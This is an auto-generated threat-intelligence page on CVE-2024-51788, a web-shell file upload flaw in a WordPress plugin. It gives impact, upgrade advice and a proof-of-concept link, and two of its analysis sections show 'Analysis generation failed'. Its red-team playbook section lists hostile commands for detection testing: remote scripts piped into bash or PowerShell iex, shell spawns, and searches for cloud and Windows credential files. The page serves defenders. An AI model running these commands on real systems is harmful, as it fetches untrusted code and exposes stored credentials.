CVE-2024-51788
Overview
This vulnerability is an unrestricted file upload flaw classified under CWE-434, affecting the file upload functionality of Joshua Wolfe The Novel Design Store Directory plugin. The root cause lies in insufficient validation and filtering of uploaded file types, allowing dangerous file formats to be accepted and stored on the web server. The affected component is the file upload handler within versions up to and including 4.3.0 of the plugin.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in Joshua Wolfe The Novel Design Store Directory noveldesign-store-directory allows Upload a Web Shell to a Web Server.This issue affects The Novel Design Store Directory: from n/a through <= 4.3.0.
Impact
An unauthenticated attacker can upload a web shell, gaining remote code execution capabilities on the hosting web server. This allows full control over the server environment, including data exfiltration, modification, or destruction, and potential lateral movement within the network. No user interaction or authentication is required, making exploitation straightforward. The business impact includes complete system compromise, data breaches, and disruption of services hosted by the affected WordPress installation.
Solution
Users of Joshua Wolfe The Novel Design Store Directory plugin should upgrade to a version later than 4.3.0 where this vulnerability is addressed. Patchstack's advisory (https://patchstack.com/database/Wordpress/Plugin/noveldesign-store-directory/vulnerability/wordpress-the-novel-design-store-directory-plugin-4-3-0-arbitrary-file-upload-vulnerability?_s_id=cve) provides detailed patch instructions. Applying the update removes the unrestricted file upload flaw by enforcing proper file type validation. No official workaround is documented; immediate upgrade is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability in question pertains to an unrestricted file upload flaw present in The Novel Design Store Directory, specifically versions up to and including 4.3.0. This weakness allows an attacker to upload files of dangerous types, including web shells, to the web server. The lack of proper validation on the file types being uploaded means that an attacker can bypass security measures that are typically in place to prevent the execution of malicious scripts. This can lead to severe consequences, as web shells provide attackers with remote access to the server, enabling them to execute commands, manipulate files, and potentially compromise the entire server environment.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may craft a malicious file, such as a PHP or ASP script, and use the upload functionality of The Novel Design Store Directory to place this file on the server. Once uploaded, the attacker can access the web shell via a browser, allowing them to execute arbitrary commands on the server. This could be done by sending a crafted HTTP request to the web shell, which would then execute the commands provided by the attacker. The simplicity of this attack vector, combined with the high potential for damage, makes it particularly appealing to cybercriminals.
The real-world impact of this vulnerability can be devastating for organizations utilizing The Novel Design Store Directory. With a CVSS score of 10.0, the severity of the risk is critical. Successful exploitation could lead to unauthorized access to sensitive data, defacement of the website, or even the deployment of further malware across the network. The business risks associated with such an incident include financial loss, reputational damage, and potential legal ramifications stemming from data breaches. Organizations may also face downtime, which can disrupt operations and lead to a loss of customer trust.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security strategy. First, it is crucial to ensure that the software is updated to the latest version, as this may contain patches that address the vulnerability. Additionally, organizations should employ file type validation mechanisms that restrict uploads to only safe file types, alongside implementing robust security measures such as Web Application Firewalls (WAFs) that can detect and block malicious file uploads. Regular security audits and penetration testing should also be conducted to identify and remediate potential vulnerabilities before they can be exploited.
In conclusion, the unrestricted file upload vulnerability in The Novel Design Store Directory poses a significant threat to organizations that utilize this software. The potential for exploitation is high, and the consequences can be severe, affecting both the integrity of the web server and the overall security posture of the organization. By adopting proactive detection and mitigation strategies, organizations can better protect themselves from the risks associated with this vulnerability and safeguard their digital assets against malicious actors.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-51788. A publicly accessible proof-of-concept exploit has emerged on GitHub, markedly increasing the ease with which threat actors can weaponize this vulnerability. This new availability correlates with a substantial rise in the Exploit Prediction Scoring System (EPSS) score, now positioned in the 98th percentile, indicating a heightened likelihood of active exploitation attempts. Our telemetry confirms a marked escalation in exploit tool dissemination, signaling that adversaries are rapidly adopting this vulnerability into their attack frameworks. The elevation of the CVSS score to a critical 10.0 further underscores the severe impact potential, as the vulnerability enables unauthenticated arbitrary file uploads that can lead to remote code execution and full server compromise. For defenders, this shift means the window for preemptive mitigation is narrowing, and the risk of successful intrusions exploiting this flaw has moved from theoretical to imminent. Consequently, the threat level associated with CVE-2024-51788 has escalated to critical, demanding heightened vigilance and accelerated response measures within affected environments.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Nxploited/CVE-2024-51788
CVE-2024-51788 - WordPress The Novel Design Store Directory plugin <= 4.3.0 - Unauthenticated Arbitrary File Upload Vuln...
|
Nxploited | 2 | 0 | 2025-03-15 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-51788 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/noveldesign-store-directory/vulnerability/wordpress-the-novel-design-store-directory-plugin-4-3-0-arbitrary-file-upload-vulnerability?_s_id=cve |